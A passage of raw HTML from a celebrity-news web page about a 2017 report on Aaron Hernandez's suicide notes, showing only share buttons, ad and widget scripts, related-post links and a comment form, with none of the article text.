onclick="essb_window(&#39;http://www.meneame.net/submit.php?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;meneame&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Meneame</span></a></li><li class="essb_item essb_link_blogger nolightbox"> <a href="https://www.blogger.com/blog_this.pyra?t&u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&n=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;https://www.blogger.com/blog_this.pyra?t&u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&n=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;blogger&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Blogger</span></a></li><li class="essb_item essb_link_amazon nolightbox"> <a href="http://www.amazon.com/gp/wishlist/static-add?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://www.amazon.com/gp/wishlist/static-add?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;amazon&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Amazon</span></a></li><li class="essb_item essb_link_yahoomail nolightbox"> <a href="http://compose.mail.yahoo.com/?body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://compose.mail.yahoo.com/?body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;yahoomail&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Yahoo Mail</span></a></li><li class="essb_item essb_link_gmail nolightbox"> <a href="https://mail.google.com/mail/u/0/?view=cm&fs=1&su=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&ui=2&tf=1" title="" onclick="essb_window(&#39;https://mail.google.com/mail/u/0/?view=cm&fs=1&su=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&ui=2&tf=1&#39;,&#39;gmail&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Gmail</span></a></li><li class="essb_item essb_link_aol nolightbox"> <a href="http://webmail.aol.com/Mail/ComposeMessage.aspx?subject=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;http://webmail.aol.com/Mail/ComposeMessage.aspx?subject=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&body=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;aol&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">AOL</span></a></li><li class="essb_item essb_link_newsvine nolightbox"> <a href="http://www.newsvine.com/_tools/seed&save?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&h=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://www.newsvine.com/_tools/seed&save?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&h=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;newsvine&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Newsvine</span></a></li><li class="essb_item essb_link_hackernews nolightbox"> <a href="https://news.ycombinator.com/submitlink?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;https://news.ycombinator.com/submitlink?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&t=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;hackernews&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">HackerNews</span></a></li><li class="essb_item essb_link_evernote nolightbox"> <a href="http://www.evernote.com/clip.action?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;http://www.evernote.com/clip.action?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;evernote&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Evernote</span></a></li><li class="essb_item essb_link_myspace nolightbox"> <a href="https://myspace.com/post?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" title="" onclick="essb_window(&#39;https://myspace.com/post?u=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&#39;,&#39;myspace&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">MySpace</span></a></li><li class="essb_item essb_link_mailru nolightbox"> <a href="http://connect.mail.ru/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&description=" title="" onclick="essb_window(&#39;http://connect.mail.ru/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&description=&#39;,&#39;mailru&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Mail.ru</span></a></li><li class="essb_item essb_link_viadeo nolightbox"> <a href="https://www.viadeo.com/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;https://www.viadeo.com/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;viadeo&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Viadeo</span></a></li><li class="essb_item essb_link_line nolightbox"> <a href="line://msg/text/Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_window(&#39;line://msg/text/Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097&#39;,&#39;line&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Line</span></a></li><li class="essb_item essb_link_flipboard nolightbox"> <a href="https://share.flipboard.com/bookmarklet/popout?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report" title="" onclick="essb_window(&#39;https://share.flipboard.com/bookmarklet/popout?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&#39;,&#39;flipboard&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Flipboard</span></a></li><li class="essb_item essb_link_comments nolightbox"> <a href="#comments" title="" onclick="" target="_self" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Comments</span></a></li><li class="essb_item essb_link_yummly nolightbox"> <a href="http://www.yummly.com/urb/verify?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&image=http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez.png&yumtype=button" title="" onclick="essb_window(&#39;http://www.yummly.com/urb/verify?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&title=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&image=http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez.png&yumtype=button&#39;,&#39;yummly&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Yummly</span></a></li><li class="essb_item essb_link_sms nolightbox"> <a href="sms:&body=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_window(&#39;sms:&body=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097&#39;,&#39;sms&#39;,&#39;1689089863&#39;); return false;" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">SMS</span></a></li><li class="essb_item essb_link_viber nolightbox"> <a href="viber://forward?text=Aaron%20Hernandez%20Wrote%20Suicide%20Note%20To%20Alleged%20Gay%20Prison%20Lover%20Before%20Death%20—%20Report%20http%3A%2F%2Fwww.thenewstrack.com%2F%3Fp%3D147097" title="" onclick="essb_tracking_only('', 'viber', '1689089863', true);" target="_blank" rel="nofollow" ><span class="essb_icon"></span><span class="essb_network_name">Viber</span></a></li></ul></div></div></div> <div class="essb_morepopup_shadow essb_morepopup_shadow_1665603744" onclick="essb_toggle_less_popup('1665603744'); return false;"></div><div class="essb_break_scroll"></div>
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-content_bottom ">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                <ul class="td-tags td-post-small-box clearfix"><li><span>TAGS</span></li><li><a href="http://www.thenewstrack.com/tag/aaron-hernandez/">Aaron Hernandez</a></li><li><a href="http://www.thenewstrack.com/tag/aaron-hernandez-dead/">Aaron Hernandez dead</a></li><li><a href="http://www.thenewstrack.com/tag/celebrity-news/">Celebrity News</a></li></ul>            </div>

            <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">SHARE</span>
            <div class="td-default-sharing">
	            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a>
	            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report&url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&via=%40thenewstrack"><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a>
	            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
	            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;media=http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez.png&description=Aaron Hernandez supposedly composed three notes before he conferred suicide in his jail cell. Presently, a stunning new report asserts that one was routed" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
	            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=Aaron+Hernandez+Wrote+Suicide+Note+To+Alleged+Gay+Prison+Lover+Before+Death+%E2%80%94+Report%20-%20http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F" ><i class="td-icon-whatsapp"></i></a>
            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" data-text="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>            <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="http://www.thenewstrack.com/kris-jenner-dreading-caitlyns-2020%e2%80%b2-interview-she-feels-weird-having-sex-life-exposed/">Kris Jenner Dreading Caitlyn’s ’20/20′ Interview: ‘She Feels Weird’ Having Sex Life Exposed</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Next article</span><a href="http://www.thenewstrack.com/selena-gomez-at-david-henries-wedding-she-stuns-in-gorgeous-red-dress-pic/">Selena Gomez At David Henrie’s Wedding: She Stuns In Gorgeous Red Dress — Pic</a></div></div></div>            <div class="author-box-wrap"><a href="http://www.thenewstrack.com/author/adela-brant/"><img alt='' src='http://0.gravatar.com/avatar/3777d1cb643ad2e22a7d5df0cc61c88b?s=96&#038;r=g' srcset='http://0.gravatar.com/avatar/3777d1cb643ad2e22a7d5df0cc61c88b?s=192&amp;r=g 2x' class='avatar avatar-96 photo' height='96' width='96' /></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="http://www.thenewstrack.com/author/adela-brant/">Adela Brant</a></span></div><div class="td-author-url"><a href="http://thenewstrack.com">http://thenewstrack.com</a></div><div class="td-author-description"></div><div class="td-author-social"></div><div class="clearfix"></div></div></div>	        <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Adela Brant"></span><meta itemprop="datePublished" content="2017-04-22T10:33:19+00:00"><meta itemprop="dateModified" content="2017-04-22T10:33:19+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://www.thenewstrack.com/wp-content/uploads/2016/10/newtrack-large2ff.png"></span><meta itemprop="name" content="The News Track"></span><meta itemprop="headline " content="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez.png"><meta itemprop="width" content="528"><meta itemprop="height" content="585"></span>        </footer>

    </article> <!-- /.post -->

    <div class="td_block_wrap td_block_related_posts td_uid_5_58fb774934063_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_5_58fb774934063" ><script>var block_td_uid_5_58fb774934063 = new tdBlock();
block_td_uid_5_58fb774934063.id = "td_uid_5_58fb774934063";
block_td_uid_5_58fb774934063.atts = '{"limit":3,"sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"next_prev","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":3,"td_ajax_preloading":"","td_ajax_filter_type":"td_custom_related","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_5_58fb774934063_rand","offset":"","css":"","live_filter":"cur_post_same_categories","live_filter_cur_post_id":147097,"live_filter_cur_post_author":"8447"}';
block_td_uid_5_58fb774934063.td_column_number = "3";
block_td_uid_5_58fb774934063.block_type = "td_block_related_posts";
block_td_uid_5_58fb774934063.post_count = "3";
block_td_uid_5_58fb774934063.found_posts = "2057";
block_td_uid_5_58fb774934063.header_color = "";
block_td_uid_5_58fb774934063.ajax_pagination_infinite_stop = "";
block_td_uid_5_58fb774934063.max_num_pages = "686";
tdBlocksArray.push(block_td_uid_5_58fb774934063);
</script><h4 class="td-related-title"><a id="td_uid_6_58fb77494255d" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_5_58fb774934063" href="#">RELATED ARTICLES</a><a id="td_uid_7_58fb77494259c" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_5_58fb774934063" href="#">MORE FROM AUTHOR</a></h4><div id=td_uid_5_58fb774934063 class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.thenewstrack.com/john-cena-farts-on-nikki-bella-after-they-get-naked-in-racy-youtube-video-watch/" rel="bookmark" title="John Cena Farts On Nikki Bella After They Get Naked In Racy YouTube Video — Watch"><img width="218" height="150" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/John-Cena-1-218x150.png" alt="John Cena" title="John Cena Farts On Nikki Bella After They Get Naked In Racy YouTube Video — Watch"/></a></div>                <a href="http://www.thenewstrack.com/category/celebrities/" class="td-post-category">Celebrities</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/john-cena-farts-on-nikki-bella-after-they-get-naked-in-racy-youtube-video-watch/" rel="bookmark" title="John Cena Farts On Nikki Bella After They Get Naked In Racy YouTube Video — Watch">John Cena Farts On Nikki Bella After They Get Naked In Racy YouTube Video — Watch</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.thenewstrack.com/katy-perry-calls-herself-a-kardashian-rocking-platinum-braids-massive-cleavage-pic/" rel="bookmark" title="Katy Perry Calls Herself A Kardashian Rocking Platinum Braids &#038; Massive Cleavage — Pic"><img width="218" height="150" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Katy-Perry-218x150.png" alt="Katy Perry" title="Katy Perry Calls Herself A Kardashian Rocking Platinum Braids &#038; Massive Cleavage — Pic"/></a></div>                <a href="http://www.thenewstrack.com/category/celebrities/" class="td-post-category">Celebrities</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/katy-perry-calls-herself-a-kardashian-rocking-platinum-braids-massive-cleavage-pic/" rel="bookmark" title="Katy Perry Calls Herself A Kardashian Rocking Platinum Braids &#038; Massive Cleavage — Pic">Katy Perry Calls Herself A Kardashian Rocking Platinum Braids &#038; Massive Cleavage — Pic</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://www.thenewstrack.com/selena-gomez-at-david-henries-wedding-she-stuns-in-gorgeous-red-dress-pic/" rel="bookmark" title="Selena Gomez At David Henrie’s Wedding: She Stuns In Gorgeous Red Dress — Pic"><img width="218" height="150" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Selena-Gomez-4-218x150.png" alt="Selena Gomez" title="Selena Gomez At David Henrie’s Wedding: She Stuns In Gorgeous Red Dress — Pic"/></a></div>                <a href="http://www.thenewstrack.com/category/celebrities/" class="td-post-category">Celebrities</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/selena-gomez-at-david-henries-wedding-she-stuns-in-gorgeous-red-dress-pic/" rel="bookmark" title="Selena Gomez At David Henrie’s Wedding: She Stuns In Gorgeous Red Dress — Pic">Selena Gomez At David Henrie’s Wedding: She Stuns In Gorgeous Red Dress — Pic</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_5_58fb774934063" data-td_block_id="td_uid_5_58fb774934063"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_5_58fb774934063" data-td_block_id="td_uid_5_58fb774934063"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->

	<div class="comments" id="comments">
        				<div id="respond" class="comment-respond">
			<h3 id="reply-title" class="comment-reply-title">LEAVE A REPLY <small><a rel="nofollow" id="cancel-comment-reply-link" href="/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/#respond" style="display:none;">Cancel reply</a></small></h3>				<form action="http://www.thenewstrack.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
					<div class="clearfix"></div>
				<p class="comment-form-input-wrap">
					<textarea placeholder="Comment:" id="comment" name="comment" cols="45" rows="8" aria-required="true"></textarea>
		        </p><p class="comment-form-input-wrap">
			            <span class="comment-req-wrap">
			            	<input class="" id="author" name="author" placeholder="Name:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap">
			            <span class="comment-req-wrap"><input class="" id="email" name="email" placeholder="Email:" type="text" value="" size="30" /></span></p>
<p class="comment-form-input-wrap">
			            <input class="" id="url" name="url" placeholder="Website:" type="text" value="" size="30" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='147097' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="7b1e94e0c1" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="69"/></p>				</form>
					</div><!-- #respond -->
		    </div> <!-- /.content -->
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <aside class="widget widget_text"><div class="block-title"><span>Search From Google</span></div>			<div class="textwidget"><style type="text/css">
@import url(//www.google.com/cse/api/branding.css);
</style>
<div class="cse-branding-bottom" style="background-color:#FFFFFF;color:#000000">
  <div class="cse-branding-form">
    <form action="http://www.google.com" id="cse-search-box" target="_blank">
      <div>
        <input type="hidden" name="cx" value="partner-pub-5686136442868151:9826682823" />
        <input type="hidden" name="ie" value="UTF-8" />
        <input type="text" name="q" size="55" />
        <input type="submit" name="sa" value="Search" />
      </div>
    </form>
    <script type="text/javascript" src="http://www.google.com/jsapi"></script>
    <script type="text/javascript">google.load("elements", "1", {packages: "transliteration"});</script>
    <script type="text/javascript" src="http://www.google.com/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
  </div>
  <div class="cse-branding-logo">
    <img src="http://www.google.com/images/poweredby_transparent/poweredby_FFFFFF.gif" alt="Google" />
  </div>
  <div class="cse-branding-text">
    Custom Search
  </div>
</div>
</div>
		</aside>
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-sidebar ">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<span class="td-adspot-title">- Advertisement -</span><ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<span class="td-adspot-title">- Advertisement -</span><ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<span class="td-adspot-title">- Advertisement -</span><ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<span class="td-adspot-title">- Advertisement -</span><ins class="adsbygoogle" style="display:inline-block;width:336px;height:280px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="4656767225"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

